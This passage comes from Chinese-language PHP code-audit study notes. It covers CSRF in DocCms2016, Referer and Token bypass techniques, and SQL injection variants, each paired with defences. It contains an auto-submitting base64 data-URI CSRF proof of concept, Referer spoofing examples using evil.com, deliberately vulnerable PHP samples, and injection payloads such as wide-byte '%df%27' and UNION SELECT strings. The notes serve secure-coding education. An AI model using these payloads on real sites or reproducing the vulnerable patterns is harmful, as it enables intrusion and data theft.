class="line">重要的是，对于每个可能的绕过手段，你需要验证其是否适用于目标系统，以及修复的有效性。对于安全漏洞修复，建议采取以下措施：</span><br><span class="line"></span><br><span class="line">输入验证和过滤：对用户输入进行严格的验证和过滤，确保只允许合法的字符和路径。</span><br><span class="line"></span><br><span class="line">使用白名单：采用白名单机制来限制访问的文件或目录，只允许指定的路径。</span><br><span class="line"></span><br><span class="line">使用安全的API和函数：使用安全的API和函数来处理文件路径和文件操作，避免直接拼接用户输入。</span><br><span class="line"></span><br><span class="line">安全编码实践：采用安全的编程实践，对敏感操作和函数进行严格的访问控制和权限验证。</span><br><span class="line"></span><br><span class="line">安全配置：在系统配置中限制应用程序的访问权限，确保它只能访问必要的文件和目录。</span><br></pre></td></tr></table></figure>



</li>
</ul>
<p><strong>学习来源:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">公众号Bypass 《PHP代码审计入门笔记》</span><br><span class="line"></span><br><span class="line">《Web安全原理分析与实践》   李江涛</span><br></pre></td></tr></table></figure>

</font>

<font size=4 >

<!-- more -->

<h1 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h1><p>*<em>1.漏洞案例: *</em></p>
<p>CMS官网：<a href="http://www.doccms.com" target="_blank" rel="noopener">http://www.doccms.com</a><br>程序源码：DocCms2016<br>在\doccms\admini\controllers\system\back.php中,export函数直接对提交上来的参数tables/sizelimit进行处理，<br>导出sql备份文件，未对访问来源进行有效验证，导致数据库备份模块存在CSRF漏洞</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">function export()</span><br><span class="line">&#123;</span><br><span class="line">  global $db,$request,$sizelimit,$startrow;</span><br><span class="line">  $tables&#x3D;$request[&#39;tables&#39;];</span><br><span class="line">  $sizelimit&#x3D;$request[&#39;sizelimit&#39;];</span><br><span class="line">  if($request[&#39;dosubmit&#39;])</span><br><span class="line">  &#123;</span><br><span class="line">      $fileid &#x3D; isset($request[&#39;fileid&#39;]) ? $request[&#39;fileid&#39;] : 1;</span><br><span class="line">      if($fileid&#x3D;&#x3D;1 &amp;&amp; $tables)</span><br><span class="line">      &#123;</span><br><span class="line">          if(!isset($tables) || !is_array($tables))</span><br><span class="line">              echo &quot;&lt;script&gt;alert(&#39;请选择要备份的数据表!&#39;);window.history.go(0);&lt;&#x2F;script&gt;&quot;;</span><br><span class="line">          $random &#x3D; mt_rand(100000, 999999);</span><br><span class="line">          cache_write(&#39;bakup_tables.php&#39;, $tables);</span><br><span class="line">      &#125;</span><br><span class="line">      else</span><br><span class="line">      &#123;</span><br><span class="line">          if(!$tables &#x3D; cache_read(&#39;bakup_tables.php&#39;))</span><br><span class="line">              echo &quot;&lt;script&gt;alert(&#39;请选择要备份的数据表!&#39;);window.history.go(-1);&lt;&#x2F;script&gt;&quot;;</span><br><span class="line">      &#125;</span><br><span class="line">      $sqldump &#x3D; &#39;&#39;;</span><br><span class="line">      $tableid &#x3D; isset($request[&#39;tableid&#39;]) ? $request[&#39;tableid&#39;] - 1 : 0;</span><br><span class="line">      $startfrom &#x3D; isset($request[&#39;startfrom&#39;]) ? intval($request[&#39;startfrom&#39;]) : 0;</span><br><span class="line">      $tablenumber &#x3D; count($tables);</span><br><span class="line">      for($i &#x3D; $tableid; $i &lt; $tablenumber &amp;&amp; strlen($sqldump) &lt; $sizelimit * 1024; $i++)</span><br><span class="line">      &#123;</span><br><span class="line">          $sqldump .&#x3D; sql_dumptable($tables[$i], $startfrom, strlen($sqldump));</span><br><span class="line">          $startfrom &#x3D; 0;</span><br><span class="line">      &#125;</span><br></pre></td></tr></table></figure>

<p><strong>2.漏洞防范:</strong></p>
<p>CSRF攻击是攻击者利用用户的身份操作用户帐户的一种攻击方式，通常可以采用如下措施来进行防御:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1、增加Token&#x2F;Referer验证</span><br><span class="line">2、增加验证码</span><br><span class="line">3、用户二次验证</span><br><span class="line">4、HTTP 头中自定义属性并验证</span><br></pre></td></tr></table></figure>

<p><strong>3.绕过技巧:</strong></p>
<p>CSRF可以使用验证Referer/Token的方式进行防御，但是有防护就有可能被绕过，网站服务端的验证方法仍然可能存<br>在漏洞，需要进行不断的尝试.<br>(有条件限制 不一定所有的Refere/Token验证就可以绕过)</p>
<ul>
<li><strong>Referer绕过姿势</strong></li>
</ul>
<p><strong>1.空Referer绕过</strong></p>
<p>跨协议间提交请求。常见的协议：ftp://,   http://,    https://,   file://,    javascript:,    data:，最简单的情况就是我们在本地打开<br>一个HTML页面，这个时候浏览器地址栏是    file:// 开头的，如果这个HTML页面向任何http站点提交请求的话，这些请<br>求的Referer都是空的。那么我们接下来可以利用 data:   协议来构造一个自动提交的CSRF攻击。当然这个协议是IE不支<br>持的，我们可以换用javascript:<br>假如<a href="http://a.b.com/d" target="_blank" rel="noopener">http://a.b.com/d</a> 这个接口存在空Referer绕过的CSRF，那么我们的POC可以是这样的:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">  &lt;body&gt;</span><br><span class="line">      &lt;iframe</span><br><span class="line">src&#x3D;&quot;data:text&#x2F;html;base64,PGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPWh0dHA6Ly9hLmIuY29tL2Q+PGlucHV0</span><br><span class="line">IHR5cGU9dGV4dCBuYW1lPSdpZCcgdmFsdWU9JzEyMycvPjwvZm9ybT48c2NyaXB0PmRvY3VtZW50LmZvcm1zWzBdLnN</span><br><span class="line">1Ym1pdCgpOzwvc2NyaXB0Pg&#x3D;&#x3D;&quot;&gt;</span><br><span class="line">  &lt;&#x2F;doby&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br></pre></td></tr></table></figure>

<p>上面iframe的src的代码其实是:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;form method&#x3D;post action&#x3D;http:&#x2F;&#x2F;a.b.com&#x2F;d&gt;&lt;input type&#x3D;text name&#x3D;&#39;id&#39; value&#x3D;&#39;123&#39;&#x2F;&gt;&lt;&#x2F;form&gt;</span><br><span class="line">&lt;script&gt;document.forms[0].submit();&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<p><strong>2.判断Referer是某域情况下绕过</strong></p>
<p>比如你找的CSRF是<strong>xxx.com</strong> 验证的referer是验证的   <em>.xx.com 可以找个二级域名 之后  *</em>img.”CSRF地址”** 之后在把文章地址发出去 就可以伪造</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Referfer：https:&#x2F;&#x2F;www.evil.com</span><br><span class="line">修改为：</span><br><span class="line">Referfer：https:&#x2F;&#x2F;img.evil.com</span><br></pre></td></tr></table></figure>

<p><strong>3.判断Referer是否存在某关键词</strong></p>
<p>referer判断存在不存在google.com这个关键词<br><strong>在网站新建一个google.com目录 把CSRF存放在google.com目录,即可绕过</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Referer：https:&#x2F;&#x2F;www.google.com&#x2F;xxx.jsp</span><br><span class="line">修改为：</span><br><span class="line">Referer：https:&#x2F;&#x2F;www.evil.com&#x2F;www.google.com&#x2F;xxx.jsp</span><br><span class="line">Referer：https:&#x2F;&#x2F;www.evil.com&#x2F;www.google.com&#x2F;xxx.jsp.php</span><br></pre></td></tr></table></figure>

<p><strong>4.判断referer是否有某域名</strong></p>
<p>仅判断了Referer开头是否以google.com以及google子域名，<strong>不验证根域名</strong>为233.com 那么我这里可以构造子域名<br>x.google.com.xxx.com作为蠕虫传播的载体服务器，即可绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Referer: http:&#x2F;&#x2F;member.xxx.com</span><br><span class="line">修改为：</span><br><span class="line">Referer: http:&#x2F;&#x2F;member.xxx.com.evil.com</span><br></pre></td></tr></table></figure>

<ul>
<li><strong>Token绕过姿势:</strong></li>
</ul>
<p><strong>1.Token无效验证</strong></p>
<p>服务端没有校验token，直接将URL中将参数token去掉。另外，部分模块有Token校验，有些模块却没有<br>token，找那些没有校验的漏网之鱼。</p>
<p><strong>2.利用xss漏洞来绕过CSRF防御(这个我不会)</strong></p>
<p>存在xss的情况下，使用ajax来跨域获取DOM节点中的Token字段,来进行构造。</p>
<p><strong>3.Token是固定不变的</strong></p>
<p>Token规则过于简单，比如根据某个用户id做了单向hash获得的，可以直接去构造。</p>
<p><strong>4.Token泄露</strong></p>
<p>Token的表数据泄露，或者算法泄露，程序逻辑不严谨导致的安全隐患。</p>
<p><strong>学习来源:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">公众号Bypass 《PHP代码审计入门笔记》</span><br></pre></td></tr></table></figure>

</font>

<font size=4 >

<!-- more -->

<h1 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h1><p><strong>1.普通注入:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;SQL参数拼接，未做任何过滤</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;连数据库</span><br><span class="line">$con &#x3D; mysql_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;root&quot;);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;当数据库不存在时</span><br><span class="line">if (!$con)</span><br><span class="line">&#123;die(&#39;Could not connect: &#39; . mysql_error());&#125;</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;在数据库中查询$id</span><br><span class="line">mysql_select_db(&quot;test&quot;, $con);</span><br><span class="line">$id &#x3D; stripcslashes($_REQUEST[ &#39;id&#39; ]);</span><br><span class="line">$query &#x3D; &quot;SELECT * FROM users WHERE id &#x3D; $id &quot;;</span><br><span class="line">$result &#x3D; mysql_query($query)or die(&#39;&lt;pre&gt;&#39;.mysql_error().&#39;&lt;&#x2F;pre&gt;&#39;);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;返回所有结果</span><br><span class="line">while($row &#x3D; mysql_fetch_array($result))</span><br><span class="line">&#123;</span><br><span class="line">echo $row[&#39;0&#39;] . &quot; &quot; . $row[&#39;1&#39;];</span><br><span class="line">echo &quot;&lt;br &#x2F;&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">echo &quot;&lt;br&#x2F;&gt;&quot;;</span><br><span class="line">echo $query;</span><br><span class="line">mysql_close($con);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>测试语句:   id=1 UNION SELECT user(),2,3,4 from users</strong></p>
<p><strong>2.宽字节注入</strong></p>
<ul>
<li>MYSQL中的宽字符注入</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;采用gbk编码,所以存在宽字节注入</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">$con &#x3D; mysql_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;root&quot;);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;采用gbk编码,所以存在宽字节注入</span><br><span class="line">mysql_query(&quot;SET NAMES &#39;gbk&#39;&quot;);</span><br><span class="line">mysql_select_db(&quot;test&quot;, $con);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;开始查询,使用了addslashes函数,自动对 单引号&#39; 转义为 \&#39;</span><br><span class="line">$id &#x3D; isset($_GET[&#39;id&#39;]) ? addslashes($_GET[&#39;id&#39;]) : 1;</span><br><span class="line">$query &#x3D; &quot;SELECT * FROM users WHERE id &#x3D;&#39;&#123;$id&#125;&#39; &quot;;</span><br><span class="line">$result &#x3D; mysql_query($query)or die(&#39;&lt;pre&gt;&#39;.mysql_error().&#39;&lt;&#x2F;pre&gt;&#39;);</span><br><span class="line"></span><br><span class="line">while($row &#x3D; mysql_fetch_array($result))</span><br><span class="line">&#123;</span><br><span class="line">echo $row[&#39;0&#39;] . &quot; &quot; . $row[&#39;1&#39;];</span><br><span class="line">echo &quot;&lt;br &#x2F;&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">echo &quot;&lt;br&#x2F;&gt;&quot;;</span><br><span class="line">echo $query;</span><br><span class="line">mysql_close($con);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>测试语句:   %df%27</strong></p>
<p>mysql的特性，因为gbk是多字节编码，两个字节代表一个汉字，%df%27 经过转义后会变成 %df%5C%27 ,其中 %df%5c 会被识别为一个新的字节 ‘運’ ，而 %27 则被当做单引号，成功实现了语句闭合.</p>
<p>第一个字节ascii码大于128，基本上就可以了。比如我们不用%df，用%a1也可以.(a1h即161d)<br>gb2312编码的取值范围。它的高位范围是0xA1 ~ 0xF7，低位范围是0xA1 ~ 0xFE，而 ‘&#39; 是0x5c，是不在低位范围中的。</p>
<p>所以,0x5c根本不是gb2312中的编码，所以不会造成宽字节注入。扩展到世界上所有多字节编码，只要低位的范围中含有0x5c的编码，就可以进行宽字符注入</p>
<p>根据gbk编码，第一个字节ascii码大于128，基本上就可以了。比如我们不用%df，用%a1也可以。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">宽字符注入的修复:</span><br><span class="line"></span><br><span class="line">方案一：指定php连接mysql的字符集</span><br><span class="line">mysql_set_charset(&#39;gbk&#39;,$conn);</span><br><span class="line">id&#x3D;mysql_real_escape_string(_GET[&#39;id&#39;]);</span><br><span class="line"></span><br><span class="line">方案二:将character_set_client设置为binary（二进制）</span><br><span class="line">mysql_query(&quot;SET character_set_connection&#x3D;gbk, character_set_results&#x3D;gbk,character_set_client&#x3D;binary&quot;,$conn);</span><br><span class="line">将character_set_client设置成binary，就不存在宽字节或多字节的问题了，因为所有数据以二进制的形式传递，就能有效避免宽字符注入</span><br></pre></td></tr></table></figure>

<ul>
<li>PHP 编码转换</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$con &#x3D; mysql_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;root&quot;);</span><br><span class="line">mysql_query(&quot;SET NAMES &#39;gbk&#39;&quot;);</span><br><span class="line">mysql_select_db(&quot;test&quot;, $con);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;二进制传输</span><br><span class="line">mysql_query(&quot;SET character_set_connection&#x3D;gbk,character_set_results&#x3D;gbk,character_set_client&#x3D;binary&quot;, $con);</span><br><span class="line">$id &#x3D; isset($_GET[&#39;id&#39;]) ? addslashes($_GET[&#39;id&#39;]) : 1;</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;编码转换</span><br><span class="line">$id&#x3D;iconv(&#39;utf-8&#39;,&#39;gbk&#39;,$id);</span><br><span class="line">$query &#x3D; &quot;SELECT * FROM users WHERE id &#x3D;&#39;&#123;$id&#125;&#39; &quot;;</span><br><span class="line">$result &#x3D; mysql_query($query)or die(&#39;&lt;pre&gt;&#39;.mysql_error().&#39;&lt;&#x2F;pre&gt;&#39;);</span><br><span class="line">while($row &#x3D; mysql_fetch_array($result))</span><br><span class="line">&#123;</span><br><span class="line">echo $row[&#39;0&#39;] . &quot; &quot; . $row[&#39;1&#39;];</span><br><span class="line">echo &quot;&lt;br &#x2F;&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">echo &quot;&lt;br&#x2F;&gt;&quot;;</span><br><span class="line">echo $query;</span><br><span class="line">mysql_close($con);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>测试语句： 錦’</strong></p>
<p>錦这个字：它的utf-8编码是%e9%8c%a6，它的gbk编码是%e5%5c<br>錦被iconv从utf-8转换成gbk后，变成了%e5%5c，而后面的 单引号’ 被addslashes变成了%5c%27，这样组合起来就是%e5%5c%5c%27,两个%5c就是\，正好把反斜杠转义了，导致单引号’逃逸出单引号，产生注入.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;使用%df%27来测试</span><br><span class="line">id &#x3D; iconv(&#39;gbk&#39;,&#39;utf-8&#39;,id);   </span><br><span class="line">id &#x3D; mb_convert_encoding(id,&#39;utf-8&#39;,&#39;gbk);</span><br></pre></td></tr></table></figure>

<p>一个gbk汉字2字节，utf-8汉字3字节，<br><strong>如果我们把gbk转换成utf-8，则php会每两个字节一转换</strong>.<br>所以如果 \‘ 前面的字符是奇数的话，势必会吞掉 反斜杆\ ,而 单引号’ 逃出限制</p>
<p><strong>3.编码解码绕过</strong></p>
<p>找一些编码解码的函数来绕过防护,，如urldecode() 、rawurldecode()、base64_decode()</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$con &#x3D; mysql_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;root&quot;);</span><br><span class="line">mysql_select_db(&quot;test&quot;, $con);</span><br><span class="line">$id &#x3D; addslashes($_REQUEST[&#39;id&#39;]);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;base64解码</span><br><span class="line">$id &#x3D; urldecode($id);&#x2F;&#x2F;$id &#x3D; base64_decode($id);</span><br><span class="line"></span><br><span class="line">$query &#x3D; &quot;SELECT * FROM users WHERE id &#x3D; &#39;&#123;$id&#125;&#39;&quot;;</span><br><span class="line">$result &#x3D; mysql_query($query)or die(&#39;&lt;pre&gt;&#39;.mysql_error().&#39;&lt;&#x2F;pre&gt;&#39;);</span><br><span class="line">while($row &#x3D; mysql_fetch_array($result))</span><br><span class="line">&#123;</span><br><span class="line">echo $row[&#39;0&#39;] . &quot; &quot; . $row[&#39;1&#39;];</span><br><span class="line">echo &quot;&lt;br &#x2F;&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">echo &quot;&lt;br&#x2F;&gt;&quot;;</span><br><span class="line">echo $query;</span><br><span class="line">mysql_close($con);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>测试语句：<br>UrlEncode:<br>1’union select 1,2,3,4%23   ==&gt;    1%2527union select 1,2,3,4%23</strong></p>
<p><strong>Base64Encode:<br>1’union select 1,2,3,4#     ==&gt;    MSd1bmlvbiBzZWxlY3QgMSwyLDMsNCM=</strong></p>
<p><strong>4.二次注入:</strong></p>
<p>原理:<br>我们所输入的数据: hack’ 入库后转义符就会消失，变成 hack’ ,查询出库的就是 hack’ ，如果拼接到SQL语句，成功引入了单引号闭合前面字符，<br>导致注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;实例代码:</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;测试数据</span><br><span class="line">create table test(</span><br><span class="line">id INT NOT NULL,</span><br><span class="line">user VARCHAR(100) NOT NULL,</span><br><span class="line">pass VARCHAR(100) NOT NULL</span><br><span class="line">)</span><br><span class="line">INSERT INTO test values(1,&#39;hack&#39;,&#39;hack&#39;);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;测试代码</span><br><span class="line">&lt;?php</span><br><span class="line">$con &#x3D; mysql_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;root&quot;);</span><br><span class="line">mysql_select_db(&quot;test&quot;, $con);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;以二进制的方式进行传输</span><br><span class="line">mysql_query(&quot;SET character_set_connection&#x3D;gbk,character_set_results&#x3D;gbk,character_set_client&#x3D;binary&quot;, $con);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;update入库</span><br><span class="line">if (isset($_GET[&#39;key&#39;]))&#123;</span><br><span class="line">  $key&#x3D;addslashes($_REQUEST[&#39;key&#39;]);</span><br><span class="line">  $query &#x3D;&quot;update test set user&#x3D;&#39;&#123;$key&#125;&#39; where id&#x3D;1&quot;;</span><br><span class="line">  echo &quot;INSERT SQL: &quot;.$query.&quot;&lt;br&#x2F;&gt;&quot;;</span><br><span class="line">  $result &#x3D; mysql_query($query);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;select 出库，并带入查询</span><br><span class="line">$query &#x3D; &quot;SELECT * FROM test WHERE id &#x3D; 1&quot;;</span><br><span class="line">$result &#x3D; mysql_query($query);</span><br><span class="line">$row &#x3D; mysql_fetch_row($result);</span><br><span class="line">echo &quot;&lt;br&#x2F;&gt;&quot;;</span><br><span class="line">$query &#x3D; &quot;SELECT * FROM test WHERE user &#x3D; &#39;&#123;$row[1]&#125;&#39;&quot;;</span><br><span class="line">print_r(&#39;SELECT SQL: &#39;.$query.&#39;&lt;br&#x2F;&gt;&#39;);</span><br><span class="line">$result &#x3D; mysql_query($query)or die(&#39;&lt;pre&gt;&#39;.mysql_error().&#39;&lt;&#x2F;pre&gt;&#39;);;</span><br><span class="line">echo &quot;&lt;br&#x2F;&gt;&quot;;</span><br><span class="line">print_r(mysql_fetch_row($result));</span><br><span class="line">mysql_close($con);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>5.全局防护盲点:</strong></p>
<p>1、str_replace函数 过滤单引号等，可能造成注入；<br>2、stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。stripslashes函数使用不当，可能造成注入:</p>
<p>①注入点类似id=1这种整型的参数就会完全无视GPC的过滤； ②注入点包含键值对的，那么这里只检测了value，对<br>key的过滤就没有防护； ③有时候全局的过滤只过滤掉GET、POST和COOKIE，但是没过滤SERVER。</p>
<p>①FILES注入，全局只转义掉GET、POST等传来的参数，遗漏了FILES； ②变量覆盖，危险函数：extract()、<br>parse_str()、$$</p>
<p><strong>6.漏洞防护:</strong></p>
<p>基本思路：输入（解决数字型注入）——-转义处理（解决字符型注入）——-输出（解决数据库报错）</p>
<ul>
<li><p>1.检查输入的数据是否具有所期望的数据格式。PHP 有很多可以用于检查输入的函数，从简单的变量函数和字符类<br>型函数（比如 is_numeric()，ctype_digit()）到复杂的 Perl 兼容正则表达式函数都可以完成这个工作。如果程序等待<br>输入一个数字，可以考虑使用 is_numeric() 来检查，或者直接使用 settype() 来转换它的类型，也可以用 sprintf() 把<br>它格式化为数字</p>
</li>
<li><p>2、PHP内置转义函数<br>Addslashes() <a href="http://php.net/manual/zh/function.addslashes.php" target="_blank" rel="noopener">http://php.net/manual/zh/function.addslashes.php</a><br>magic_quote_gpc <a href="http://php.net/manual/zh/info.configuration.php#ini.magic-quotes-gpc" target="_blank" rel="noopener">http://php.net/manual/zh/info.configuration.php#ini.magic-quotes-gpc</a><br>mysql_real_escape_string() <a href="http://php.net/manual/zh/function.mysql-real-escape-string.php" target="_blank" rel="noopener">http://php.net/manual/zh/function.mysql-real-escape-string.php</a><br>mysql_escape_string() <a href="http://php.net/manual/zh/function.mysql-escape-string.php" target="_blank" rel="noopener">http://php.net/manual/zh/function.mysql-escape-string.php</a></p>
</li>
<li><p>3、数据库报错信息泄露防范：<br>把php.ini文件display_errors = Off<br>数据库查询函数前面加一个@字符</p>
</li>
</ul>
<p><strong>最有效可预防SQL注入攻击的防御方式：预处理技术进行数据库查询</strong>:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;示例代码:</span><br><span class="line">&lt;?php</span><br><span class="line">$mysqli &#x3D; new MySQLi(&quot;localhost&quot;,&quot;root&quot;,&quot;root&quot;,&quot;test&quot;);</span><br><span class="line">if(!$mysqli)&#123;</span><br><span class="line">die($mysqli-&gt;error);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$sql &#x3D; &quot;select id,username,password from users where id&#x3D;?&quot;;&#x2F;&#x2F;&#x2F;&#x2F;创建一个预定义的对象 ?用来占位</span><br><span class="line">$mysqli_stmt &#x3D; $mysqli-&gt;prepare($sql);</span><br><span class="line">$id&#x3D;$_REQUEST[&#39;id&#39;];</span><br><span class="line">$mysqli_stmt-&gt;bind_param(&quot;i&quot;,$id);&#x2F;&#x2F;&#x2F;&#x2F;绑定参数</span><br><span class="line">$mysqli_stmt-&gt;bind_result($id,$username,$password);&#x2F;&#x2F;&#x2F;&#x2F;绑定结果集</span><br><span class="line">$mysqli_stmt-&gt;execute();&#x2F;&#x2F;执行</span><br><span class="line"></span><br><span class="line">while($mysqli_stmt-&gt;fetch())&#123;   &#x2F;&#x2F;取出绑定的结果集</span><br><span class="line">echo $id.&quot; &quot;.$username .&quot; &quot;. $password;</span><br><span class="line">&#125;</span><br><span class="line">echo &quot;&lt;br&#x2F;&gt;&quot;;</span><br><span class="line">echo $sql;</span><br><span class="line">$mysqli_stmt-&gt;free_result(); &#x2F;&#x2F;&#x2F;&#x2F;关闭结果集</span><br><span 